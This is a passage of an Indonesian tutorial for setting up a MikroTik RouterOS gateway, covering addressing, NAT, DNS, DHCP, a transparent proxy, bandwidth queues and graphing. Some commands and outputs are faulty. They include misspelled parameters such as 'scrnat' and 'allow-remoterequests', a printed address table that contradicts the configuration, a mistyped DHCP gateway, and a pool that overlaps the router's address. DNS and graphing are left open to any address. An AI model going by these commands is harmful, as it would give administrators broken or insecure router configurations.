juga, yaitu Via Browser serta Via Winbox.&lt;br /&gt;Untuk sekarang saya akan bahas via Teks. Karena cepat serta lebih memahami&lt;br /&gt;terhadap sistem operasi ini.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[4]-- Perintah Dasar&lt;br /&gt;&lt;br /&gt;Perintah mikrotik sebenarnya hampir sama dengan perintah yang ada dilinux,&lt;br /&gt;sebab pada dasarnya mikrotik ini merupakan kernel Linux, hasil pengolahan&lt;br /&gt;kembali Linux dari Distribusi Debian. Pemakaian perintah shellnya sama,&lt;br /&gt;seperti penghematan perintah, cukup menggunakan tombol TAB di keyboard&lt;br /&gt;maka perintah yang panjang, tidak perlu lagi diketikkan, hanya ketikkan&lt;br /&gt;awal nama perintahnya, nanti secara otomatis Shell akan menampilkan sendiri&lt;br /&gt;perintah yang berkenaan. Misalnya perintah IP ADDRESS di mikrotik. Cukup&lt;br /&gt;hanya mengetikkan IP ADD spasi tekan tombol TAB, maka otomatis shell&lt;br /&gt;akan mengenali dan menterjemahkan sebagai perintah IP ADDRESS.&lt;br /&gt;&lt;br /&gt;Baiklah kita lanjutkan pengenalan perintah ini.&lt;br /&gt;&lt;br /&gt;Setelah login, cek kondisi interface atau ethernet card.&lt;br /&gt;&lt;br /&gt;--[4.1]-- Melihat kondisi interface pada Mikrotik Router&lt;br /&gt;&lt;br /&gt;[admin@Mikrotik] &gt; interface print&lt;br /&gt; Flags: X - disabled, D - dynamic, R - running&lt;br /&gt;#    NAME                         TYPE             RX-RATE    TX-RATE    MTU&lt;br /&gt;0  R ether1                        ether            0          0          1500&lt;br /&gt;1  R ether2                       ether            0          0          1500&lt;br /&gt;&lt;br /&gt;[admin@Mikrotik]&gt;&lt;br /&gt;&lt;br /&gt;Jika interfacenya ada tanda X (disabled) setelah nomor (0,1), maka periksa lagi&lt;br /&gt;etherned cardnya, seharusnya R (running).&lt;br /&gt;&lt;br /&gt;a. Mengganti nama interface&lt;br /&gt; [admin@Mikrotik] &gt; interface(enter)&lt;br /&gt;&lt;br /&gt;b. Untuk mengganti nama Interface ether1 menjadi Public (atau terserah namanya), maka &lt;br /&gt; [admin@Mikrotik] interface&gt; set 0 name=Public&lt;br /&gt;&lt;br /&gt;c. Begitu juga untuk ether2, misalkan namanya diganti menjadi Local, maka&lt;br /&gt; [admin@Mikrotik] interface&gt; set 1 name=Local&lt;br /&gt;&lt;br /&gt;d. atau langsung saja dari posisi root direktori, memakai tanda "/", tanpa tanda kutip&lt;br /&gt; [admin@Mikrotik] &gt; /interface set 0 name=Public&lt;br /&gt;&lt;br /&gt;e. Cek lagi apakah nama interface sudah diganti.&lt;br /&gt; [admin@Mikrotik] &gt; /interface print&lt;br /&gt;&lt;br /&gt; Flags: X - disabled, D - dynamic, R - running&lt;br /&gt; #    NAME                         TYPE             RX-RATE    TX-RATE    MTU&lt;br /&gt; 0  R Local                        ether            0          0          1500&lt;br /&gt; 1  R Public                       ether            0          0          1500&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[4.2]-- Mengganti password default&lt;br /&gt;Untuk keamanan ganti password default&lt;br /&gt;  [admin@Mikrotik] &gt; password&lt;br /&gt;  old password: *****&lt;br /&gt;  new password: *****&lt;br /&gt;  retype new password: *****&lt;br /&gt;  [admin@ Mikrotik]]&gt;&lt;br /&gt;&lt;br /&gt;--[4.3]-- Mengganti nama hostname&lt;br /&gt;Mengganti nama Mikrotik Router untuk memudahkan konfigurasi, pada langkah ini&lt;br /&gt;  nama server akan diganti menjadi “routerku"&lt;br /&gt;&lt;br /&gt;  [admin@Mikrotik] &gt; system identity set name=routerku&lt;br /&gt;  [admin@routerku]&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[5]-- Setting IP Address, Gateway, Masqureade dan Name Server&lt;br /&gt;&lt;br /&gt;--[5.1]-- IP Address&lt;br /&gt;&lt;br /&gt;Bentuk Perintah konfigurasi&lt;br /&gt;&lt;br /&gt;  ip address add address ={ip address/netmask} interface={nama interface}&lt;br /&gt;&lt;br /&gt;a. Memberikan IP address pada interface Mikrotik. Misalkan Public akan kita gunakan untuk&lt;br /&gt; koneksi ke Internet dengan IP 192.168.1.2 dan Local akan kita gunakan untuk network LAN&lt;br /&gt; kita dengan IP 192.168.0.30 (Lihat topologi)&lt;br /&gt;&lt;br /&gt;  [admin@routerku] &gt; ip address add address=192.168.1.2 \&lt;br /&gt;  netmask=255.255.255.0 interface=Public comment="IP ke Internet"&lt;br /&gt;&lt;br /&gt;  [admin@routerku] &gt; ip address add address=192.168.0.30 \&lt;br /&gt;  netmask=255.255.255.224 interface=Local comment = "IP ke LAN"&lt;br /&gt;&lt;br /&gt;b. Melihat konfigurasi IP address yang sudah kita berikan&lt;br /&gt;&lt;br /&gt;  [admin@routerku] &gt;ip address print&lt;br /&gt;  Flags: X - disabled, I - invalid, D - dynamic&lt;br /&gt;  #   ADDRESS            NETWORK         BROADCAST       INTERFACE&lt;br /&gt;  0   ;;; IP Address ke Internet&lt;br /&gt;      192.168.0.30/27   192.168.0.0    192.168.0.31      Local  &lt;br /&gt;  1   ;;; IP Address ke LAN&lt;br /&gt;      192.168.1.2/24    192.168.0.0    192.168.1.255     Public &lt;br /&gt;  [admin@routerku]&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[5.2]-- Gateway&lt;br /&gt;&lt;br /&gt;Bentuk Perintah Konfigurasi&lt;br /&gt;&lt;br /&gt;   ip route add gateway={ip gateway}&lt;br /&gt;    &lt;br /&gt;a. Memberikan default Gateway, diasumsikan gateway untuk koneksi internet adalah&lt;br /&gt; 192.168.1.1&lt;br /&gt;&lt;br /&gt; [admin@routerku] &gt; /ip route add gateway=192.168.1.1&lt;br /&gt;&lt;br /&gt;b. Melihat Tabel routing pada Mikrotik Routers&lt;br /&gt;&lt;br /&gt; [admin@routerku] &gt; ip route print&lt;br /&gt;&lt;br /&gt;  Flags: X - disabled, A - active, D - dynamic,&lt;br /&gt;  C - connect, S - static, r - rip, b - bgp, o - ospf&lt;br /&gt;  #     DST-ADDRESS     PREFSRC       G GATEWAY        DISTANCE   INTERFACE&lt;br /&gt;  0 ADC 192.168.0.0/24   192.168.0.30                             Local&lt;br /&gt;  1 ADC 192.168.0.0/27  192.168.1.2                               Public&lt;br /&gt;  2 A S 0.0.0.0/0                     r 192.168.1.1               Public&lt;br /&gt;  [admin@routerku]&gt;&lt;br /&gt;&lt;br /&gt;c. Tes Ping ke Gateway untuk memastikan konfigurasi sudah benar&lt;br /&gt;&lt;br /&gt;  [admin@routerku] &gt; ping 192.168.1.1&lt;br /&gt;  192.168.1.1  64 byte ping: ttl=64 time&lt;1 ttl="64" max =" 0/0.0/0"&gt;&lt;br /&gt;&lt;br /&gt;--[5.3]-- NAT (Network Address Translation)&lt;br /&gt;&lt;br /&gt;Bentuk Perintah Konfigurasi&lt;br /&gt;&lt;br /&gt; ip firewall nat add chain=srcnat action=masquerade out-inteface={ethernet&lt;br /&gt; yang langsung terhubung ke Internet atau Public}&lt;br /&gt;&lt;br /&gt;a. Setup Masquerading, Jika Mikrotik akan kita pergunakan sebagai gateway server maka agar&lt;br /&gt; client computer pada network dapat terkoneksi ke internet perlu kita masquerading.&lt;br /&gt;&lt;br /&gt;  [admin@routerku] &gt; ip firewall nat add chain=scrnat out-interface=Public action=masquerade&lt;br /&gt;  [admin@routerku]&gt;&lt;br /&gt;&lt;br /&gt;b. Melihat konfigurasi Masquerading&lt;br /&gt;&lt;br /&gt;  [admin@routerku] ip firewall nat print&lt;br /&gt;  Flags: X - disabled, I - invalid, D - dynamic&lt;br /&gt;  0   chain=srcnat out-interface=Public action=masquerade&lt;br /&gt;  [admin@routerku]&gt;&lt;br /&gt;&lt;br /&gt;--[5.4] Name server&lt;br /&gt;&lt;br /&gt;Bentuk Perintah Konfigurasi&lt;br /&gt;&lt;br /&gt;    ip dns set primary-dns={dns utama} secondary-dns={dns ke dua}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;a. Setup DNS pada Mikrotik Routers, misalkan DNS dengan Ip Addressnya&lt;br /&gt;  Primary = 202.134.0.155, Secondary = 202.134.2.5&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  [admin@routerku] &gt; ip dns set primary-dns=202.134.0.155 allow-remoterequests=yes&lt;br /&gt;  [admin@routerku] &gt; ip dns set secondary-dns=202.134.2.5 allow-remoterequests=yes&lt;br /&gt;&lt;br /&gt;b. Melihat konfigurasi DNS&lt;br /&gt;&lt;br /&gt;  [admin@routerku] &gt; ip dns print&lt;br /&gt;  primary-dns: 202.134.0.155&lt;br /&gt;  secondary-dns: 202.134.2.5&lt;br /&gt;  allow-remote-requests: no&lt;br /&gt;  cache-size: 2048KiB&lt;br /&gt;  cache-max-ttl: 1w&lt;br /&gt;  cache-used: 16KiB&lt;br /&gt;&lt;br /&gt;  [admin@routerku]&gt;&lt;br /&gt;&lt;br /&gt;c. Tes untuk akses domain, misalnya dengan ping nama domain&lt;br /&gt;&lt;br /&gt;  [admin@routerku] &gt; ping yahoo.com&lt;br /&gt;  216.109.112.135 64 byte ping: ttl=48 time=250 ms&lt;br /&gt;  10 packets transmitted, 10 packets received, 0% packet loss&lt;br /&gt;  round-trip min/avg/max = 571/571.0/571 ms&lt;br /&gt;  [admin@routerku]&gt;&lt;br /&gt;&lt;br /&gt;Jika sudah berhasil reply berarti seting DNS sudah benar.&lt;br /&gt;&lt;br /&gt;Setelah langkah ini bisa dilakukan pemeriksaan untuk koneksi dari jaringan local. Dan jika&lt;br /&gt;berhasil berarti kita sudah berhasil melakukan instalasi Mikrotik Router sebagai Gateway&lt;br /&gt;server. Setelah terkoneksi dengan jaringan Mikrotik dapat dimanage menggunakan WinBox yang&lt;br /&gt;bisa di download dari Mikrotik.com atau dari server mikrotik kita. Misal Ip address server&lt;br /&gt;mikrotik kita 192.168.0.30, via browser buka http://192.168.0.30. Di Browser akan ditampilkan&lt;br /&gt;dalam bentuk web dengan beberapa menu, cari tulisan Download dan download WinBox dari situ.&lt;br /&gt;Simpan di local harddisk. Jalankan Winbox, masukkan Ip address, username dan password.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[7]-- DHCP Server&lt;br /&gt;&lt;br /&gt;DHCP merupakan singkatan dari Dynamic Host Configuration Protocol, yaitu suatu program yang&lt;br /&gt;memungkinkan pengaturan IP Address di dalam sebuah jaringan dilakukan terpusat di server,&lt;br /&gt;sehingga PC Client tidak perlu melakukan konfigurasi IP Addres. DHCP memudahkan administrator&lt;br /&gt;untuk melakukan pengalamatan ip address untuk client.&lt;br /&gt;&lt;br /&gt;Bentuk perintah konfigurasi&lt;br /&gt;&lt;br /&gt;ip dhcp-server setup&lt;br /&gt;dhcp server interface = { interface yang digunakan }&lt;br /&gt;dhcp server space = { network yang akan di dhcp }&lt;br /&gt;gateway for dhcp network = { ip gateway }&lt;br /&gt;address to give out = { range ip address }&lt;br /&gt;dns servers = { name server }&lt;br /&gt;lease time = { waktu sewa yang diberikan }&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Jika kita menginginkan client mendapatkan IP address secara otomatis maka perlu kita setup&lt;br /&gt;dhcp server pada Mikrotik. Berikut langkah-langkahnya :&lt;br /&gt;&lt;br /&gt;a. Tambahkan IP address pool&lt;br /&gt;&lt;br /&gt;  /ip pool add name=dhcp-pool ranges=192.168.0.1-192.168.0.30&lt;br /&gt;&lt;br /&gt;b. Tambahkan DHCP Network dan gatewaynya yang akan didistribusikan ke client.&lt;br /&gt; Pada contoh ini networknya adalah 192.168.0.0/27 dan gatewaynya 122.168.0.30&lt;br /&gt;&lt;br /&gt;  /ip dhcp-server network add address=192.168.0.0/27 gateway=192.168.0.30 dns-server=192.168.0.30 \&lt;br /&gt;  comment=""&lt;br /&gt;&lt;br /&gt;c. Tambahkan DHCP Server ( pada contoh ini dhcp diterapkan pada interface Local )&lt;br /&gt;&lt;br /&gt;  /ip dhcp-server add interface=local address-pool=dhcp-pool&lt;br /&gt;&lt;br /&gt;d. Lihat status DHCP server&lt;br /&gt;&lt;br /&gt;  [admin@routerku] &gt; ip dhcp-server print&lt;br /&gt;&lt;br /&gt;  Flags: X - disabled, I - invalid&lt;br /&gt;&lt;br /&gt;  # NAME INTERFACE RELAY ADDRESS-POOL LEASE-TIME ADD-ARP&lt;br /&gt;&lt;br /&gt;  0dhcp1 Local&lt;br /&gt;&lt;br /&gt;Tanda X menyatakan bahwa DHCP server belum enable maka perlu dienablekan terlebih&lt;br /&gt;dahulu pada langkah e.&lt;br /&gt;&lt;br /&gt;e. Jangan Lupa dibuat enable dulu dhcp servernya&lt;br /&gt;&lt;br /&gt;  /ip dhcp-server enable 0&lt;br /&gt;&lt;br /&gt;kemudian cek kembali dhcp-server seperti langkah 4, jika tanda X sudah tidak ada berarti&lt;br /&gt;sudah aktif&lt;br /&gt;&lt;br /&gt;f. Tes Dari client&lt;br /&gt;&lt;br /&gt;Misalnya :&lt;br /&gt;D:\&gt;ping www.yahoo.com&lt;br /&gt;&lt;br /&gt;--[8]-- Transparent Proxy Server&lt;br /&gt;&lt;br /&gt;Proxy server merupakan program yang dapat mempercepat akses ke suatu web&lt;br /&gt;yang sudah diakses oleh komputer lain, karena sudah di simpan didalam&lt;br /&gt;caching server.Transparent proxy menguntungkan dalam management client,&lt;br /&gt;karena system administrator tidak perlu lagi melakukan setup proxy di&lt;br /&gt;setiap browser komputer client karena redirection dilakukan otomatis di sisi&lt;br /&gt;server.&lt;br /&gt;&lt;br /&gt;Bentuk perintah konfigurasi :&lt;br /&gt;a. Setting web proxy :&lt;br /&gt;&lt;br /&gt;- ip proxy set enable=yes&lt;br /&gt;port={ port yang mau digunakan }&lt;br /&gt;maximal-client-connections=1000&lt;br /&gt;maximal-server-connections=1000&lt;br /&gt;&lt;br /&gt;- ip proxy direct add src-address={ network yang akan di&lt;br /&gt;NAT} action=allow&lt;br /&gt;&lt;br /&gt;- ip web-proxy set parent-proxy={proxy parent/optional}&lt;br /&gt;hostname={ nama host untuk proxy/optional}&lt;br /&gt;port={port yang mau digunakan}&lt;br /&gt;src-address={ address yang akan digunakan untuk koneksi&lt;br /&gt;              ke parent proxy/default 0.0.0.0}&lt;br /&gt;transparent-proxy=yes&lt;br /&gt;max-object-size={ ukuran maximal file yang akan disimpan&lt;br /&gt;sebagai cache/default 4096 in Kilobytes}&lt;br /&gt;max-cache-size= { ukuran maximal hardisk yang akan&lt;br /&gt;                  dipakai sebagai penyimpan file cache/unlimited&lt;br /&gt;                  | none | 12 in megabytes}&lt;br /&gt;cache-administrator={ email administrator yang akan digunakan&lt;br /&gt;                      apabila proxy error, status akan dikirim&lt;br /&gt;                      ke email tersebut}&lt;br /&gt;enable==yes&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Contoh konfigurasi&lt;br /&gt;-------------------&lt;br /&gt;&lt;br /&gt;a. Web proxy setting&lt;br /&gt;&lt;br /&gt;/ ip web-proxy&lt;br /&gt;set enabled=yes src-address=0.0.0.0 port=8080 \&lt;br /&gt;  hostname="proxy.routerku.co.id" transparent-proxy=yes \&lt;br /&gt;  parent-proxy=0.0.0.0:0 cache-administrator="support@routerku.co.id" \&lt;br /&gt;  max-object-size=131072KiB cache-drive=system max-cache-size=unlimited \&lt;br /&gt;  max-ram-cache-size=unlimited&lt;br /&gt;&lt;br /&gt;Nat Redirect, perlu ditambahkan yaitu rule REDIRECTING untuk membelokkan&lt;br /&gt;traffic HTTP menuju ke WEB-PROXY.&lt;br /&gt;&lt;br /&gt;b. Setting firewall untuk Transparant Proxy&lt;br /&gt;&lt;br /&gt; Bentuk perintah konfigurasi :&lt;br /&gt;&lt;br /&gt; ip firewall nat add chain=dstnat&lt;br /&gt; protocol=tcp&lt;br /&gt; dst-port=80&lt;br /&gt; action=redirect&lt;br /&gt; to-ports={ port proxy }&lt;br /&gt;&lt;br /&gt;Perintahnya:&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;/ ip firewall nat&lt;br /&gt;add chain=dstnat protocol=tcp dst-port=80 action=redirect to-ports=8080 \&lt;br /&gt;  comment="" disabled=no&lt;br /&gt;add chain=dstnat protocol=tcp dst-port=3128 action=redirect to-ports=8080 \&lt;br /&gt;  comment="" disabled=no&lt;br /&gt;add chain=dstnat protocol=tcp dst-port=8000 action=redirect to-ports=8080 \&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;perintah diatas dimaksudkan, agar semua trafik yang menuju Port 80,3128,8000&lt;br /&gt;dibelokkan menuju port 8080 yaitu portnya Web-Proxy.&lt;br /&gt;&lt;br /&gt;CATATAN:&lt;br /&gt;Perintah&lt;br /&gt;&lt;br /&gt;/ip web-proxy print { untuk melihat hasil konfigurasi web-proxy}&lt;br /&gt;/ip web-proxy monitor { untuk monitoring kerja web-proxy}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[9]-- Bandwidth Management&lt;br /&gt;&lt;br /&gt;QoS memegang peranan sangat penting dalam hal memberikan pelayanan&lt;br /&gt;yang baik pada client. Untuk itu kita memerlukan bandwidth management&lt;br /&gt;untuk mengatur tiap data yang lewat, sehingga pembagian bandwidth menjadi&lt;br /&gt;adil. Dalam hal ini Mikrotik RouterOs juga menyertakan packet software&lt;br /&gt;untuk memanagement bandwidth.&lt;br /&gt;&lt;br /&gt;Bentuk perintah konfigurasi:&lt;br /&gt;&lt;br /&gt;queue simple add name={ nama }&lt;br /&gt;target-addresses={ ip address yang dituju }&lt;br /&gt;interface={ interface yang digunakan untuk melewati data }&lt;br /&gt;max-limit={ out/in }&lt;br /&gt;&lt;br /&gt;Dibawah ini terdapat konfigurasi Trafik shaping atau bandwidth management&lt;br /&gt;dengan metode Simple Queue, sesuai namanya, Jenis Queue ini memang&lt;br /&gt;sederhana, namun memiliki kelemahan, kadangkala terjadi kebocoran bandwidth&lt;br /&gt;atau bandwidthnya tidak secara real di monitor. Pemakaian untuk 10 Client,&lt;br /&gt;Queue jenis ini tidak masalah.&lt;br /&gt;&lt;br /&gt;Diasumsikan Client ada sebanyak 15 client, dan masing-masing client diberi&lt;br /&gt;jatah bandwidth minimum sebanyak 8kbps, dan maksimum 48kbps. Sedangkan&lt;br /&gt;Bandwidth totalnya sebanyak 192kbps. Untuk upstream tidak diberi rule,&lt;br /&gt;berarti masing-masing client dapat menggunakan bandwidth uptream secara&lt;br /&gt;maksimum. Perhatikan perintah priority, range priority di Mikrotik sebanyak&lt;br /&gt;delapan. Berarti dari 1 sampai 8, priority 1 adalah priority tertinggi,&lt;br /&gt;sedangkan priority 8 merupakan priority terendah.&lt;br /&gt;&lt;br /&gt;Berikut Contoh kongirufasinya.&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;/ queue simple&lt;br /&gt;add name="trafikshaping" target-addresses=192.168.0.0/27 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=none priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/64000 max-limit=0/192000 total-queue=default disabled=no&lt;br /&gt;add name="01" target-addresses=192.168.0.1/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="02" target-addresses=192.168.0.2/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="03" target-addresses=192.168.0.3/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="04" target-addresses=192.168.0.4/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="10" target-addresses=192.168.0.25/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="05" target-addresses=192.168.0.5/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="06" target-addresses=192.168.0.6/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="07" target-addresses=192.168.0.7/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="08" target-addresses=192.168.0.8/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="09" target-addresses=192.168.0.9/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="10" target-addresses=192.168.0.10/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="11" target-addresses=192.168.0.11/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="12" target-addresses=192.168.0.12/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="13" target-addresses=192.168.0.13/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="14" target-addresses=192.168.0.14/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;add name="15" target-addresses=192.168.0.15/32 dst-address=0.0.0.0/0 \&lt;br /&gt;  interface=all parent=trafikshaping priority=1 queue=default/default \&lt;br /&gt;  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no&lt;br /&gt;&lt;br /&gt;Perintah diatas karena dalam bentuk command line, bisa juga di copy&lt;br /&gt;paste, selanjutnya di paste saja ke consol mikrotiknya. ingat lihat&lt;br /&gt;dulu path atau direktory aktif. Silahkan dipaste saja, kalau posisi&lt;br /&gt;direktorynya di Root.&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------&lt;br /&gt;Terminal vt102 detected, using multiline input mode&lt;br /&gt;[admin@mikrotik] &gt;&lt;br /&gt;------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Pilihan lain metode bandwidth manajemen ini, kalau seandainya ingin&lt;br /&gt;bandwidth tersebut dibagi sama rata oleh Mikrotik, seperti bandwidth&lt;br /&gt;256kbps downstream dan 256kbps upstream. Sedangkan client yang akan&lt;br /&gt;mengakses sebanyak 10 client, maka otomatis masing-masing client&lt;br /&gt;mendapat jatah bandwidth upstream dan downstream sebanyak 256kbps&lt;br /&gt;dibagi 10. Jadi masing-masing dapat 25,6kbps. Andaikata hanya 2 Client&lt;br /&gt;yang mengakses maka masing-masing dapat 128kbps.&lt;br /&gt;&lt;br /&gt;Untuk itu dipakai type PCQ (Per Connection Queue), yang bisa secara&lt;br /&gt;otomatis membagi trafik per client. Tentang jenis queue di mikrotik&lt;br /&gt;ini dapat dibaca pada manualnya di http://www.mikrotik.com/testdocs/&lt;br /&gt;ros/2.9/root/queue.php.&lt;br /&gt;&lt;br /&gt;Sebelumnya perlu dibuat aturan di bagian MANGLE. Seperti :&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;/ip firewall mangle add chain=forward src-address=192.168.0.0/27 \&lt;br /&gt; action=mark-connection new-connection-mark=users-con&lt;br /&gt;/ip firewall mangle add connection-mark=users-con action=mark-packet \&lt;br /&gt; new-packet-mark=users chain=forward&lt;br /&gt;----------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Karena type PCQ belum ada, maka perlu ditambah, ada 2 type PCQ ini.&lt;br /&gt;Pertama diberi nama pcq-download, yang akan mengatur semua trafik&lt;br /&gt;melalui alamat tujuan/destination address. Trafik ini melewati&lt;br /&gt;interface Local. Sehingga semua traffik download/downstream yang&lt;br /&gt;datang dari jaringan 192.168.0.0/27 akan dibagi secara otomatis.&lt;br /&gt;&lt;br /&gt;Tipe PCQ kedua, dinamakan pcq-upload, untuk mengatur semua trafik upstream&lt;br /&gt;yang berasal dari alamat asal/source address. Trafik ini melewati&lt;br /&gt;interface public. Sehingga semua traffik upload/upstream yang berasal&lt;br /&gt;dari jaringan 192.168.0.0/27 akan dibagi secara otomatis.&lt;br /&gt;&lt;br /&gt;Perintah:&lt;br /&gt;-------------------------------------------------------------------------&lt;br /&gt;/queue type add name=pcq-download kind=pcq pcq-classifier=dst-address&lt;br /&gt;/queue type add name=pcq-upload kind=pcq pcq-classifier=src-address&lt;br /&gt;-------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Setelah aturan untuk PCQ dan Mangle ditambahkan, sekarang untuk aturan&lt;br /&gt;pembagian trafiknya. Queue yang dipakai adalah Queue Tree, Yaitu:&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------&lt;br /&gt;/queue tree add parent=Local queue=pcq-download packet-mark=users&lt;br /&gt;/queue tree add parent=Public queue=pcq-upload packet-mark=users&lt;br /&gt;-------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Perintah diatas mengasumsikan, kalau bandwidth yang diterima dari provider&lt;br /&gt;Internet berflukstuasi atau berubah-rubah. Jika kita yakin bahwa bandwidth&lt;br /&gt;yang diterima, misalkan dapat 256kbs downstream, dan 256kbps upstream, maka&lt;br /&gt;ada lagi aturannya, seperti :&lt;br /&gt;&lt;br /&gt;Untuk trafik downstreamnya :&lt;br /&gt;------------------------------------------------------------------------&lt;br /&gt;/queue tree add name=Download parent=Local max-limit=256k&lt;br /&gt;/queue tree add parent=Download queue=pcq-download packet-mark=users&lt;br /&gt;-------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Dan trafik upstreamnya :&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;/queue tree add name=Upload parent=Public max-limit=256k&lt;br /&gt;/queue tree add parent=Upload queue=pcq-upload packet-mark=users&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;--[10]-- Monitor MRTG via Web&lt;br /&gt;&lt;br /&gt;Fasilitas ini diperlukan untuk monitoring trafik dalam bentuk grafik, dapat&lt;br /&gt;dilihat dengan menggunakan browser. MRTG (The Multi Router Traffic Grapher)&lt;br /&gt;telah dibuild sedemikian rupa, sehingga memudahkan kita memakainya. Telah&lt;br /&gt;tersedia dipaket dasarnya.&lt;br /&gt;&lt;br /&gt;Contoh konfigurasinya&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------&lt;br /&gt;/ tool graphing&lt;br /&gt;set store-every=5min&lt;br /&gt;/ tool graphing interface&lt;br /&gt;add interface=all allow-address=0.0.0.0/0 store-on-disk=yes disabled=no&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Perintah diatas akan menampilkan grafik dari trafik yang melewati interface&lt;br /&gt;jaringan baik berupa Interface Public dan Interface Local, yang dirender&lt;br /&gt;setiap 5 menit sekali. Juga dapat diatur Alamat apa saja yang dapat mengakses&lt;br /&gt;MRTG ini, pada parameter allow-address.&lt;br /&gt;&lt;br /&gt;--[11]-- Keamanan di Mikrotik&lt;br /&gt;&lt;br /&gt;Setelah beberapa Konfigurasi diatas telah disiapkan, tentu tidak lupa kita&lt;br /&gt;perhatikan keamanan dari Mesin gateway Mikrotik ini, ada beberapa fasilitas&lt;br /&gt;yang dipergunakan. Dalam hal ini akan dibahas tentang Firewallnya. Fasilitas&lt;br /&gt;Firewall ini secara pringsip serupa dengan IP TABLES di Gnu/Linux hanya saja&lt;br /&gt;beberapa perintah telah di sederhanakan namun berdaya guna.&lt;br /&gt;&lt;br /&gt;Di Mikrotik perintah firewall ini terdapat dalam modus IP, yaitu&lt;br /&gt;&lt;br /&gt;[admin@routerku] &gt; /ip firewall&lt;br /&gt;&lt;br /&gt;Terdapat beberapa packet filter seperti mangle, nat, dan filter.&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------&lt;br /&gt;[admin@routerku] ip firewall&gt; ?&lt;br /&gt;&lt;br /&gt;Firewall allows IP packet filtering on per packet basis.&lt;br /&gt;&lt;br /&gt;.. -- go up to ip&lt;br /&gt;mangle/ -- The packet marking management&lt;br /&gt;nat/ -- Network Address Translation&lt;br /&gt;connection/ -- Active connections&lt;br /&gt;filter/ -- Firewall filters&lt;br /&gt;address-list/ --&lt;br /&gt;service-port/ -- Service port management&lt;br /&gt;export --&lt;br 